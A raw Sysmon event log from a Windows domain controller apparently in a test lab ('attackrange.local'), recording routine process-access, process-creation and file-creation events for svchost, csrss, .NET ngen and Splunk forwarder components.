13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.759{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.946{59A5CD1D-9235-6005-1904-00000000A301}48763472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.852{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.836{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.836{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.805{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.649{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9235-6005-1804-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.524{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9235-6005-1804-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.524{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9235-6005-1804-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:45.164{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1220-0\System.Data.Entity.dll2021-01-18 13:50:45.164 10341000x80000000000000008373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.821{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 